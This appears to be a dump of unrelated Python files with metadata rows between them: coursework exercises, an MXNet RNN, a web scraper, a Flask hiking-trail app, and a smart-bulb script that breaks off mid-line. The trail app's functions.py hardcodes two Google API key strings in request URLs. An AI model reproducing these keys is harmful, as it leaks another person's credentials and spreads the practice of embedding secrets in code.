# substituindo apenas o comando print(questão...) existente.
##
def main():
print("questao 2")
from math import sqrt
a = input().upper()
c = 0
b = 0
d = 0
e = 0
while a:
direcao = a[:a.find(' ')]
p = a[a.find(' ')+1:]
passos = int(p)
if direcao == 'CIMA':
c = c + passos
if direcao == 'BAIXO':
b = b + passos
if direcao == 'ESQUERDA':
e = e + passos
if direcao == 'DIREITA':
d = d + passos
if c > b:
X = c - b
else:
X = b - c
if e > d:
Y = e - d
else:
Y = d - e
H = sqrt((Y*Y)+(X*X))
a = input().upper()
print(int(H))
if __name__ == '__main__':
main()
| true |
db6917f1d8d2dea5f7d2c4b6a74c24c69308b444 | Python | sanlingdd/NN | /MXNETDeepLearning/RNNTimeMachine.py | UTF-8 | 4,288 | 2.703125 | 3 | [] | no_license | # coding=utf-8
import sys
sys.path.append('..')
from mxnet import ndarray as nd
import re
with open("data/timemachine.txt") as f:
time_machine = f.read()
def getWords(string):
eraseString = string.lower().replace('\n', '').replace('\r', '').replace('\s','')
return re.split('(\W)', eraseString)
#time_machine = time_machine.lower().replace('\n', '').replace('\r', '').replace('\s','')
time_machine = getWords(time_machine)
character_list = list(set(time_machine))
character_dict = dict([(char,i) for i,char in enumerate(character_list)])
vocab_size = len(character_dict)
print('vocab size:', vocab_size)
time_numerical = [character_dict[char] for char in time_machine]
import random
from mxnet import nd
def data_iter(batch_size, seq_len, ctx=None):
num_examples = (len(time_numerical)-1) // seq_len
num_batches = num_examples // batch_size
# ?????
idx = list(range(num_examples))
random.shuffle(idx)
# ??seq_len???
def _data(pos):
return time_numerical[pos:pos+seq_len]
for i in range(num_batches):
# ????batch_size?????
examples = idx[i:i+batch_size]
data = nd.array(
[_data(j*seq_len) for j in examples], ctx=ctx)
label = nd.array(
[_data(j*seq_len+1) for j in examples], ctx=ctx)
yield data, label
import mxnet as mx
#GPU
import sys
sys.path.append('..')
import utils
ctx = utils.try_gpu()
print('Will use ', ctx)
num_hidden = 256
weight_scale = .01
# ???
Wxh = nd.random_normal(shape=(vocab_size,num_hidden), ctx=ctx) * weight_scale
Whh = nd.random_normal(shape=(num_hidden,num_hidden), ctx=ctx) * weight_scale
bh = nd.zeros(num_hidden, ctx=ctx)
# ???
Why = nd.random_normal(shape=(num_hidden,vocab_size), ctx=ctx) * weight_scale
by = nd.zeros(vocab_size, ctx=ctx)
params = [Wxh, Whh, bh, Why, by]
for param in params:
param.attach_grad()
def get_inputs(data):
return [nd.one_hot(X, vocab_size) for X in data.T]
def rnn(inputs, H):
# inputs: seq_len ? batch_size x vocab_size ??
# H: batch_size x num_hidden ??
# outputs: seq_len ? batch_size x vocab_size ??
outputs = []
for X in inputs:
H = nd.tanh(nd.dot(X, Wxh) + nd.dot(H, Whh) + bh)
Y = nd.dot(H, Why) + by
outputs.append(Y)
return (outputs, H)
def predict(prefix, num_chars):
# ??? prefix ??????? num_chars ???
prefix = getWords(prefix)
state = nd.zeros(shape=(1, num_hidden), ctx=ctx)
output = [character_dict[prefix[0]]]
for i in range(num_chars+len(prefix)):
X = nd.array([output[-1]], ctx=ctx)
Y, state = rnn(get_inputs(X), state)
#print(Y)
if i < len(prefix)-1:
next_input = character_dict[prefix[i+1]]
else:
next_input = int(Y[0].argmax(axis=1).asscalar())
output.append(next_input)
return ''.join([character_list[i] for i in output])
def grad_clipping(params, theta):
norm = nd.array([0.0], ctx)
for p in params:
norm += nd.sum(p.grad ** 2)
norm = nd.sqrt(norm).asscalar()
if norm > theta:
for p in params:
p.grad[:] *= theta/norm
from mxnet import autograd
from mxnet import gluon
from math import exp
epochs = 200
seq_len = 35
learning_rate = .1
batch_size = 32
softmax_cross_entropy = gluon.loss.SoftmaxCrossEntropyLoss()
for e in range(epochs+1):
train_loss, num_examples = 0, 0
state = nd.zeros(shape=(batch_size, num_hidden), ctx=ctx)
for data, label in data_iter(batch_size, seq_len, ctx):
with autograd.record():
outputs, state = rnn(get_inputs(data), state)
# reshape label to (batch_size*seq_len, )
# concate outputs to (batch_size*seq_len, vocab_size)
label = label.T.reshape((-1,))
outputs = nd.concat(*outputs, dim=0)
loss = softmax_cross_entropy(outputs, label)
loss.backward()
grad_clipping(params, 5)
utils.SGD(params, learning_rate)
train_loss += nd.sum(loss).asscalar()
num_examples += loss.size
if e % 20 == 0:
print("Epoch %d. PPL %f" % (e, exp(train_loss/num_examples)))
print(' - ', predict('The Time ', 100))
print(' - ', predict("The Medical Man rose, came to the lamp,", 100), '\n')
| true |
d43e78e72c091203d55dc52342fb89d40ea6ee5d | Python | gracechang1002/Leetcode_python | /001~200/0067. Add Binary.py | UTF-8 | 182 | 3.125 | 3 | [] | no_license | class Solution:
def addBinary(self, a: str, b: str) -> str:
a_int = int(a,2)
b_int = int(b,2)
output = bin(a_int+b_int)[2:]
return output | true |
e34ce072bf28aec3f48d312c161a76d96f23a740 | Python | wemstar/EksploracjaDanych | /Lab1/Zadanie1.py | UTF-8 | 971 | 2.953125 | 3 | [] | no_license | __author__ = 'wemstar'
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
def filterMethodOne(list,axis):
srednia=np.mean(list[:,axis])
sigma=np.std(list[:,axis])
print("{0} {1}".format(srednia,sigma))
return list[abs(list[:,axis]-srednia)> 3.0*sigma]
file =open("haberman.data","r")
data=[]
for x in file:
line=[int(value) for value in x.split(',')]
data.append(line)
data=np.array(data)
data_group1=data[data[:,3]==1]
data_group2=data[data[:,3]==2]
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(data_group1[:,0],data_group1[:,1],data_group1[:,2],c='r',marker='o')
ax.scatter(data_group2[:,0],data_group2[:,1],data_group2[:,2],c='b',marker='x')
ax.set_xlabel('Wiek')
ax.set_ylabel('Rok')
ax.set_zlabel('Węzły')
print("Kolumna 1")
print(filterMethodOne(data,0))
print("Kolumna 2")
print(filterMethodOne(data,1))
print("Kolumna 3")
print(filterMethodOne(data,2))
#plt.show()
| true |
1e5c91f64f39b71293e1d095ccd25db0b3e3566f | Python | allamberto/CSE20289-Assignments | /reading04/head2.py | UTF-8 | 894 | 3.03125 | 3 | [] | no_license | #!/usr/bin/env python3
import os
import sys
# Global Variables
ENDING = ''
# Usage function
def usage(status=0):
print('''Usage: head.py files...
-n NUM print the first NUM lines instead of the first 10'''.format(os.path.basename(sys.argv[0])))
sys.exit(status)
# Parse command line options
NUM = 10
count = 0
args = sys.argv[1:]
while len(args) and args[0].startswith('-') and len(args[0]) > 1:
arg = args.pop(0)
if arg == '-n':
NUM = args.pop(0)
elif arg == '-h':
usage(0)
else:
usage(1)
if len(args) == 0:
args.append('-')
# Main execution
for path in args:
if path == '-':
stream = sys.stdin
else:
stream = open(path)
for line in stream:
if count == int(NUM):
sys.exit(0)
line = line.rstrip()
print(line)
count = count + 1
stream.close()
| true |
bd98f1c22c08ea693d6eed20fdd85b161cda81b0 | Python | lychengrex/Bird-Species-Classification-Using-Transfer-Learning | /src/utils.py | UTF-8 | 2,431 | 2.984375 | 3 | [
"MIT"
] | permissive | import numpy as np
import matplotlib.pyplot as plt
import nntools as nt
import torch
from torch import nn
class NNClassifier(nt.NeuralNetwork):
'''
(Inherit from nt.NeuralNetwork)
Consider only neural networks that will
produce one-hot codes and that are then classifiers.
'''
def __init__(self):
super(NNClassifier, self).__init__()
self.cross_entropy = nn.CrossEntropyLoss()
def criterion(self, y, d):
return self.cross_entropy(y, d)
class ClassificationStatsManager(nt.StatsManager):
'''
(Inherit from nt.StatsManager)
'''
def __init__(self):
super(ClassificationStatsManager, self).__init__()
def init(self):
super(ClassificationStatsManager, self).init()
self.running_accuracy = 0
def accumulate(self, loss, x, y, d):
super(ClassificationStatsManager, self).accumulate(loss, x, y, d)
_, l = torch.max(y, 1)
self.running_accuracy += torch.mean((l == d).float())
def summarize(self):
loss = super(ClassificationStatsManager, self).summarize()
accuracy = 100 * self.running_accuracy / self.number_update
return {'loss': loss, 'accuracy': accuracy}
def imshow(image, ax=plt):
image = image.to('cpu').numpy()
image = np.moveaxis(image, [0, 1, 2], [2, 0, 1])
image = (image + 1) / 2
image[image < 0] = 0
image[image > 1] = 1
h = ax.imshow(image)
ax.axis('off')
return h
def plot(exp, fig, axes):
axes[0].clear()
axes[1].clear()
# training loss
axes[0].plot([exp.history[k][0]['loss'] for k in range(exp.epoch)],
label="training loss")
# evaluation loss
axes[0].plot([exp.history[k][1]['loss'] for k in range(exp.epoch)],
label="evaluation loss")
axes[0].set_xlabel('Epoch')
axes[0].set_ylabel('Loss')
axes[0].legend(('training loss', 'evaluation loss'))
# training accuracy
axes[1].plot([exp.history[k][0]['accuracy'] for k in range(exp.epoch)],
label="training accuracy")
# evaluation accuracy
axes[1].plot([exp.history[k][1]['accuracy'] for k in range(exp.epoch)],
label="evaluation accuracy")
axes[1].set_xlabel('Epoch')
axes[1].set_ylabel('Accuracy')
axes[1].legend(('training accuracy', 'evaluation accuracy'),
loc='lower right')
plt.tight_layout()
fig.canvas.draw()
| true |
1eee840ebe063ce8dfdbe1f9712c2ce8f2969c7a | Python | jer321/DK-Project | /DATA/Princess.py | UTF-8 | 490 | 2.953125 | 3 | [] | no_license | #Princesa
__Author__='Juan Fernando Otoya'
import pygame as pig
import os
class princesa():
def __init__(self,pos=(0,0),size=(45,62)):
self.rect=pig.Rect(pos,size)
self.img=pig.image.load(os.path.join('IMG','princess.png'))
self.img=pig.transform.scale(self.img,size)
def update(self,player):
if ((player.rect.right>self.rect.right>player.rect.left)\
or (player.rect.right>self.rect.left>player.rect.left))\
and player.rect.bottom>self.rect.centery>player.rect.top:
player.win=True | true |
c508eb9f0ff218b778cd89bf6436108ef4732be6 | Python | mateusgruener/cursopython | /Capítulos/6/exercício 6.1.py | UTF-8 | 242 | 3.46875 | 3 | [] | no_license | #exercício 6.1
from matplotlib.pyplot import *
import numpy as np
a=3
b=4
theta = np.linspace( -1 * np.pi, np.pi, 200)
x= a*np.cos(theta) + b*np.sin(theta)
y= -1 * a* np.sin(theta) + b*np.cos(theta)
plot(x,y, "r*")
show()
| true |
dd79a537ea52a775adf2cdd78e52536937c8948a | Python | sarah-young/Trail-Quest-1.0 | /functions.py | UTF-8 | 18,812 | 2.53125 | 3 | [] | no_license | """Functions for Trail Quest"""
import secrets
import requests
import random
import model
import password_hashing
from flask import Flask, session, jsonify
hp_api_key = secrets.HIKING_PROJECT_API_KEY
#db = SQLAlchemy()
def find_badges():
"""Find badges assigned to user"""
all_user_badges = model.db.session.query(model.Merit).filter(model.Merit.user_id==session['user_id']).all()
merit_set = set(all_user_badges)
merit_list = list(merit_set)
badge_merit = []
for merit in merit_list:
badge = model.db.session.query(model.Badge).filter(model.Badge.badge_name==merit.badges.badge_name).first()
badge_merit.append(badge)
return badge_merit
def find_uncompleted_trails():
"""Find completed trails"""
print "**IN UNCOMPLETED TRAILS FUNC***"
# SET MATH
# use session to get user_id
# query to find all user's trails
all_users_trails = model.db.session.query(model.Trek).filter(model.Trek.user_id==session['user_id']).all()
# guery to find all user's reviews
all_users_reviews = model.db.session.query(model.Review).filter(model.Review.user_id==session['user_id']).all()
# loop through each list & extract trail ids
ids_from_trail_lst = []
for trail in all_users_trails:
ids_from_trail_lst.append(trail.trail_id)
trail_lst_set = set(ids_from_trail_lst)
ids_from_trail_rvws =[]
for trail in all_users_reviews:
ids_from_trail_rvws.append(trail.trail_id)
completed_trails_set = set(ids_from_trail_rvws)
uncompleted_trails = set(ids_from_trail_lst) - set(ids_from_trail_rvws)
# completed_trail_ob_lst = []
# for c_trail in completed_trails_set:
# trail_object = model.db.session.query(model.Trail).filter(model.Trail.trail_id==c_trail).first()
# completed_trail_ob_lst.append(trail_object)
uncompleted_trail_ob_lst = []
for uc_trail in uncompleted_trails:
trail_object = model.db.session.query(model.Trail).filter(model.Trail.trail_id==uc_trail).first()
uncompleted_trail_ob_lst.append(trail_object)
return [uncompleted_trail_ob_lst, all_users_reviews]
def load_badges():
"""Create badges"""
for i, row in enumerate(open("badge_seed_data.csv")):
row = row.rstrip()
badge_name, badge_description = row.split(",")
badge = model.Badge(badge_name=badge_name,
badge_description=badge_description)
# We need to add to the session or it won't ever be stored
model.db.session.add(badge)
# provide some sense of progress
if i % 100 == 0:
print i
model.db.session.commit()
print "Completed."
def add_badge_if_applicable(t_id):
"""
When review is posted, check to see if badge should be added to user page.
user_id = db.Column(db.Integer, db.ForeignKey('users.user_id'))
badge_id = db.Column(db.Integer, db.ForeignKey('badges.badge_id'))
merit_date = db.Column(db.DateTime)
badges = db.relationship('Badge')
users = db.relationship('User')
"""
# Run query for all badges that are owned by a user
# Run only queries for badges that the user doesn't have
trail = model.db.session.query(model.Trail).filter(model.Trail.trail_id==t_id).first()
print trail
if 'waterfall' in trail.trail_description or 'water fall' in trail.trail_description:
b_id = 1
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
waterfall_merit = model.Merit(user_id = session['user_id'],
badge_id = 1)
model.db.session.add(waterfall_merit)
print 'waterfall'
if 'marmot' in trail.trail_description or 'marmots' in trail.trail_description:
b_id = 15
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
marmot_merit = model.Merit(user_id = session['user_id'],
badge_id = 15)
model.db.session.add(marmot_merit)
if 'creek' in trail.trail_description:
b_id = 2
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
creek_merit = model.Merit(user_id = session['user_id'],
badge_id = 2)
model.db.session.add(creek_merit)
if "river" in trail.trail_description:
b_id = 3
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
river_merit = model.Merit(user_id = session['user_id'],
badge_id = 3)
model.db.session.add(river_merit)
if "outlook" in trail.trail_description:
b_id = 4
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
outlook_merit = model.Merit(user_id = session['user_id'],
badge_id = 4)
model.db.session.add(outlook_merit)
if int(trail.trail_high_alt) - int(trail.trail_low_alt) > 500:
b_id = 5
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
altitude_merit = model.Merit(user_id = session['user_id'],
badge_id = 5)
model.db.session.add(altitude_merit)
if "redwood" in trail.trail_description or "redwoods" in trail.trail_description:
b_id = 6
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
redwood_merit = model.Merit(user_id = session['user_id'],
badge_id = 6)
model.db.session.add(redwood_merit)
if "fern" in trail.trail_description:
b_id = 7
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
fern_merit = model.Merit(user_id = session['user_id'],
badge_id = 7)
model.db.session.add(fern_merit)
if "wild flower" in trail.trail_description or "wildflower" in trail.trail_description:
b_id = 8
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
wildflower_merit = model.Merit(user_id = session['user_id'],
badge_id = 8)
model.db.session.add(wildflower_merit)
if "meadow" in trail.trail_description:
b_id = 9
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
meadow_merit = model.Merit(user_id = session['user_id'],
badge_id = 9)
model.db.session.add(meadow_merit)
if "mountain" in trail.trail_description or "Mountain" in trail.trail_description:
b_id = 10
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
mountain_merit = model.Merit(user_id = session['user_id'],
badge_id = 10)
model.db.session.add(mountain_merit)
if "deer" in trail.trail_description:
b_id = 11
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
merit = model.Merit(user_id = session['user_id'],
badge_id = 11)
model.db.session.add(merit)
trek_check = model.db.session.query(model.Trek).filter(model.Trek.user_id==session['user_id']).all()
if len(trek_check) > 0:
trailhead_merit = model.Merit(user_id = session['user_id'],
badge_id = 14)
model.db.session.add(trailhead_merit)
review_check = model.db.session.query(model.Review).filter(model.Review.user_id==session['user_id']).all()
if len(review_check) > 0:
first_trek_merit = model.Merit(user_id = session['user_id'],
badge_id = 12)
model.db.session.add(first_trek_merit)
if len(review_check) > 4:
high_5_merit = model.Merit(user_id = session['user_id'],
badge_id = 13)
model.db.session.add(high_5_merit)
model.db.session.commit()
def add_review_to_db(review_text, user_id, t_id):
""" Add review from user to DB """
review_check = model.db.session.query(model.Review).filter(model.Review.user_id==user_id, model.Review.trail_id==t_id).first()
if review_check == None:
review = model.Review(user_id = user_id,
trail_id = t_id,
review_text = review_text)
model.db.session.add(review)
model.db.session.commit()
else:
print "Review for this trail by user already in database."
def add_trek_to_users_trails(id_of_trail):
"""Check to see if trek is already in user's trails.
If it isn't, add to Trek database"""
user_treks = check_user_treks(id_of_trail)
print "PRINT USER TREKS: ", user_treks
if user_treks == None:
print "HERE - NONE"
trek = model.Trek(user_id = session['user_id'],
trail_id = id_of_trail)
model.db.session.add(trek)
model.db.session.commit()
return "NEW TRAIL ADDED TO TREK DB."
elif user_treks != None:
return "TRAIL ALREADY EXISTS IN DATABASE."
def check_user_treks(id_of_trail):
"""Query database to see if user has trails.
"""
user_treks = model.db.session.query(model.Trek).filter(model.Trek.user_id==session['user_id'], model.Trek.trail_id==id_of_trail).first()
# see if a trek that matches the user_id from the session AND the trail_id argument is in the database
if user_treks == None:
return None
else:
return 'Trek in database'
def extract_relevant_trail_info(trail_object):
"""Extract relevant trail info from trail object for use in
map on front end
"""
trail = trail_object
difficulty = trail_difficulty_conversion(trail.trail_difficulty)
print "RELEVANT TRAIL INFO PRINT TESTS"
print "Difficulty: ", difficulty
alt_delta = trail.trail_high_alt - trail.trail_low_alt
print "Alt Delta: ",alt_delta
trailhead_lat = trail.trailhead_latitude
trailhead_long = trail.trailhead_longitude
print trailhead_lat, trailhead_long
return [trailhead_lat, trailhead_long, trail.trail_name, trail.trail_length, trail.trail_id, difficulty, trail.trail_description, alt_delta, trail.trail_picture]
def get_dirxns(starting_address, trail_coordinates):
"""Return dirxns from Google API based on trail lat/long"""
dirxns = requests.get("http://maps.googleapis.com/maps/api/directions/json?origin="+starting_address+"&destination="+trail_coordinates+"&key=AIzaSyBZF-t6AgPD_FNUmxTd5M9gITpYKJDOmHs")
dirxns_post_json = dirxns.json()
print dirxns_post_json
return dirxns
def get_trail_object_by_id(t_id):
"""Query database for trail object by trail id."""
trail_object = model.db.session.query(model.Trail).filter(model.Trail.trail_id==t_id).first()
if t_id:
return trail_object
else:
return None
def add_user_to_database(username, password):
"""Check to see if user is in database. If they aren't add them."""
user_name_check = model.db.session.query(model.User).filter(model.User.user_name==username).first()
print user_name_check
if user_name_check == None:
print username
print password
user = model.User(user_name = username,
user_password = password)
model.db.session.add(user)
model.db.session.commit()
print "<Added user %s to database>" % username
return True
else:
print "<User %s is already in the database>" % username
return False
def find_lat_lng(city, state):
"""
Find lat/long for address given by user.
Uses Google Maps API & Hiking Project API.
Information passed from HTML form to this function.
"""
if city == "":
print "Missing city"
return None
if state == "":
print "Missing state"
return None
try:
geocode_request = requests.get("https://maps.googleapis.com/maps/api/geocode/json?address="+city+","+state+",US&key=AIzaSyCNFFFQco261DBnttijOE0NL_mAx6Mz86g")
json_geocode = geocode_request.json()
lat,lng = json_geocode['results'][0].get('geometry').get('location').values()
coordinates = (str(lat),str(lng),)
print coordinates
return coordinates
except:
return None
def check_user_credentials(username, password):
"""
Compare user entered credentials to credentials in database!
"""
user = model.db.session.query(model.User).filter(model.User.user_name==username).first()
if user:
if password_hashing.hashed_password_check(username, password):
return user
else:
return False
else:
return False
def find_trails(coordinates, radius='25'):
"""Find trails based on GPS coordinates from find_lat_lng
Uses Hiking Project API
"""
lat, lng = coordinates
# Unpacking coordinates from Google Maps API
trail_request = requests.get("https://www.hikingproject.com/data/get-trails?lat="+lat+"&lon="+lng+"&maxDistance="+radius+"&minLength=1&key="+hp_api_key)
# Requesting trails near GPS coordinate from Hiking Project API
trail_packet = trail_request.json()
#
trails = trail_packet["trails"]
return trails
def select_trails(trails):
"""Selects three random trails from trail_packet from find_trails
"""
print "***PRINT TRAIL TYPE*** ", type(trails)
if len(trails) == 0:
return None
else:
return trails
# NOTE: Keeping logic below in case I want to revert
# elif len(trails) < 4:
# selected_trails = trails
# # TODO: give message on route side that states user may want to widen search criteria
#
# return selected_trails
#
# elif len(trails) >=4:
# selected_trails = []
# random.shuffle(trails)
# first_trail = trails.pop()
# selected_trails.append(first_trail)
# second_trail = trails.pop()
# selected_trails.append(second_trail)
# third_trail = trails.pop()
# selected_trails.append(third_trail)
#
# return selected_trails
def add_trails_to_db(trails):
"""Adds user selected trail to db"""
for trail in trails:
# print "LENGTH OF TRAILS: ", len(trails)
# print "TRAIL NAME: ", trail['name']
# print "TYPE: ", type(trail)
trail_difficulty = trail_difficulty_conversion(trail['difficulty'])
#FIXME: Should I move this under the if statement for optimization???
trail_status = model.db.session.query(model.Trail).filter(model.Trail.trail_id==trail['id']).first()
if trail_status == None:
# If there is no trail with a matching trail id in the database, create new trail_object
trail_object = model.Trail(trail_id = trail['id'],
trail_name = trail['name'],
trailhead_latitude = trail['latitude'],
trailhead_longitude = trail['longitude'],
trail_length = trail['length'],
trail_difficulty = trail_difficulty,
trail_description = trail['summary'],
trail_high_alt = trail['high'],
trail_low_alt = trail['low'],
trail_location = trail['location'],
trail_picture = trail['imgMedium'])
model.db.session.add(trail_object)
model.db.session.commit()
print "<Added trail %s to database>" % trail['id']
else:
print "<Trail %s is already in the database>"
def get_trail_conditions(trail_id):
"""Calls Hiking Project API for trail conditions using trail_id."""
trail_id = str(trail_id)
conditions_request = requests.get("https://www.hikingproject.com/data/get-conditions?ids="+trail_id+"&key="+hp_api_key)
json_conditions = conditions_request.json()
response = json_conditions["0"]
trail_name_by_id = response.get("name")#.values()
print "TRAIL NAME BY ID: ", trail_name_by_id
trail_status_details =response.get("conditionStatus")#.values()
print "TRAIL STATUS DETAILS: ", trail_status_details
trail_status_color = response.get("conditionColor")#.values()
print "TRAIL STATUS COLOR: ", trail_status_color
trail_status_date = response.get("conditionDate")
if trail_status_date.startswith("1970"):
# Checks to see if there's a relevant trail condition report
trail_deets = None
print "NO REPORT AVAILABLE"
return trail_deets
elif trail_status_details.lower().startswith("unknown"):
trail_deets = None
print "NO REPORT AVAILABLE"
return trail_deets
trail_deets = (trail_name_by_id, trail_status_details, trail_status_color, trail_status_date,)
return trail_deets
def filter_trek_length(trails, trek_length):
"""Take trail list-object & filter for trails by trek length
Called in select_trails()"""
trail_list = []
for trail in trails:
if trail['length'] <= trek_length:
# filters out trails that are too long
# only appends trails to trail_list that are the same as the user's preference
trail_list.append(trail)
return trail_list
def filter_trek_difficulty(trails_filtered_by_length, trail_difficulty):
"""Take trail list-object & filter trails by difficulty
Called in select_trails()"""
if trail_difficulty == "no-preference":
# don't filter by difficulty --this list is the list we want to return.
list_of_trails = trails_filtered_by_length
return list_of_trails
else:
list_of_trails = []
for trail in trails_filtered_by_length:
trail_difficulty_rating = trail['difficulty']
# from trail object, passed to conversion function
print trail_difficulty_rating
difficulty = trail_difficulty_conversion(trail_difficulty_rating)
print "DIFFICULTY: ", difficulty
if (difficulty == "easy" or difficulty == "easy/intermediate") and trail_difficulty == "easy":
list_of_trails.append(trail)
elif (difficulty == "intermediate" or difficulty == "easy/intermediate" or difficulty == "intermediate/difficult") and trail_difficulty == "moderate":
list_of_trails.append(trail)
elif (difficulty == "intermediate/difficult" or difficulty == "difficult" or difficulty == "very difficult") and trail_difficulty == "difficult":
list_of_trails.append(trail)
return list_of_trails
def trail_difficulty_conversion(trail_difficulty_rating):
"""Take API's trail difficulty selection and return easy, moderate, difficult.
Called in filter_trek_difficulty() """
# trail_difficulty comes from user, difficulty is conversion from 'attribute' on trail object
#trail['difficulty'] comes from API
# handles one trail at a time
if trail_difficulty_rating == "green":
difficulty = "easy"
elif trail_difficulty_rating == "greenBlue":
difficulty = "easy/intermediate"
elif trail_difficulty_rating == "blue":
difficulty = "intermediate"
elif trail_difficulty_rating == "blueBlack":
difficulty = "intermediate/difficult"
elif trail_difficulty_rating == "black":
difficulty = "difficult"
elif trail_difficulty_rating == "dblack":
difficulty = "very difficult"
else:
difficulty = "unknown"
return difficulty
def show_logout_button():
"""Returns logic prompt frontend to show logout button when user is logged in"""
if session.get('user_id'):
show_logout_button = True
else:
show_logout_button = False
return show_logout_button
| true |
32c2de1bcb6a8fb264a0db9745a8e1c2c4f50a88 | Python | kkiyama117/enterlist | /enterlist/models.py | UTF-8 | 1,165 | 2.796875 | 3 | [
"MIT"
] | permissive | class Enter:
def __init__(self, enter_id: str, name: str, univ: str, department: str,
gender: str, interview: str, industry: str, demand: str, line: str, checked: bool = False):
self.enter_id = enter_id
self.name = name
self.univ = univ
self.department = department
self.gender = gender
self.interview = interview
self.industry = industry
self.demand = demand
self.line = line
self._checked = checked
def __str__(self):
return self.enter_id
def check(self):
self._checked = True
@property
def checked(self):
return self.checked
def detail(self) -> str:
text: str = f'名前: {self.name} \n 学部: {self.department} \n' \
f'性別: {self.gender} \n' \
f'希望面談内容: {self.interview} \n' \
f'志望業界: {self.industry} \n' \
f'メンターへの希望: {self.demand} \n' \
f'LINE ID: {self.line}'
return text
class Mentor:
def __init__(self, name: str, slack_id):
self._name = name
self._slack_id = slack_id
| true |
897c9444b0037f957262a72cd270775ccf77bf25 | Python | amg369/Web-Development-Project | /Models/RegisterModel.py | UTF-8 | 648 | 2.921875 | 3 | [] | no_license | import pymongo
from pymongo import MongoClient
import bcrypt
class RegisterModel:
def __init__(self):
self.client = MongoClient()
self.db = self.client.bonesfan
self.Users = self.db.users
def add_user(self, data):
hashed = bcrypt.hashpw(data.password.encode(), bcrypt.gensalt())
uid = self.Users.insert({"username": data.username, "name": data.name, "password": data.password})
myuser = self.Users.find_one({"username": data.username})
print("uid is", uid)
if bcrypt.checkpw("avocado1".encode(), myuser["password"]):
print("this matches")
| true |
ca0d30edd5b010308b5bde61b421b8a242d7de63 | Python | Paul9inee/Elementary_Algorithm | /sajun_Test/03_review.py | UTF-8 | 384 | 3.0625 | 3 | [] | no_license | import heapq
def solution(no, works): # max heap 만들기
works = [-1 * x for x in works] # min heap으로만 되어있기 떄문에 음수로 변환
heapq.heapify(works)
while no != 0:
max_val = heapq.heappop(works)
if max_val == 0:
break
heapq.heappush(works, max_val + 1)
no -= 1
return sum([i ** 2 for i in works])
| true |
890e01578d4f18a4172799f76700ded5d2b250fb | Python | shreyansh-sawarn/Hacktoberfest | /Python/ScrapBBCnews.py | UTF-8 | 1,189 | 3.90625 | 4 | [] | no_license | '''
Script to scrap the headlines of BBC News website
and gives the headlines with Links
'''
'''
Program uses requests module to get web data from URL and BeautifulSoup module to parse the web data
as HTML using html parser.
Install requests and BeautifulSoup module before executing!
'''
import requests
from bs4 import BeautifulSoup
import pprint # prints the Final output in pretty manner which is inbuilt module in Python
response = requests.get("https://www.bbc.com/")
parsed_html = BeautifulSoup(response.text,'html.parser') #parsing the received web data by html parser
headlines_links = parsed_html.select('.media__link') #All links of Headlines news are included in class "media__link"
def bbcHeadlines(headlines_links):
news = []
for links in headlines_links:
headlines = links.get_text('\n',strip=True)
if links.get('href').startswith('https'):
link = links.get('href')
news.append({'HeadLines ':headlines, 'Link': link})
else:
link = links.get('href')
news.append({'HeadLines ': headlines, 'Link': 'https://www.bbc.com'+link})
return news
pprint.pprint(bbcHeadlines(headlines_links))
| true |
c0c88a2188801a4035728bf96f6463f6343d0838 | Python | ohassa/code-eval | /p011.py | UTF-8 | 1,192 | 3.21875 | 3 | [] | no_license | import sys
TOP_NODE_VALUE = '30'
node30 = {'value': TOP_NODE_VALUE, 'parent': None}
node8 = {'value': '8', 'parent': node30}
node52 = {'value': '52', 'parent': node30}
node3 = {'value': '3', 'parent': node8}
node20 = {'value': '20', 'parent': node8}
node10 = {'value': '10', 'parent': node20}
node29 = {'value': '29', 'parent': node20}
TREE = (
(node30),
(node8, node52),
(node3, node20),
(node10, node29)
)
NODE_VALUE_TO_LEVEL_MAP = {
TOP_NODE_VALUE: 0,
'8': 1,
'52': 1,
'3': 2,
'20': 2,
'10': 3,
'29': 3
}
del node30, node8, node52, node3, node20, node10, node29
for line in open(sys.argv[1]):
node1Value, node2Value = line.split()
level1, level2 = NODE_VALUE_TO_LEVEL_MAP[node1Value], NODE_VALUE_TO_LEVEL_MAP[node2Value]
if node1Value == TOP_NODE_VALUE or node2Value == TOP_NODE_VALUE:
print(TOP_NODE_VALUE)
continue
if level1 == level2:
node1IndexInLevel = 0
else:
# make sure node1 is at a higher level than node2
if level1 > level2:
node1Value, node2Value = node2Value, node1Value
level1, level2 = level2, level1
node1IndexInLevel = 0 if TREE[level1][0]['value'] == node1Value else 1
print(TREE[level1][node1IndexInLevel]['parent']['value']) | true |
09cfc2278b44262a0f1e46215a5fb9a0657136d0 | Python | dawgster/NikoHack | /bulb.py | UTF-8 | 1,771 | 2.53125 | 3 | [] | no_license | #!/usr/bin/env python3
import requests
from dotenv import load_dotenv
import os
load_dotenv()
def set_bulb_color(h, s, v):
ip = os.getenv("raspi_ip")
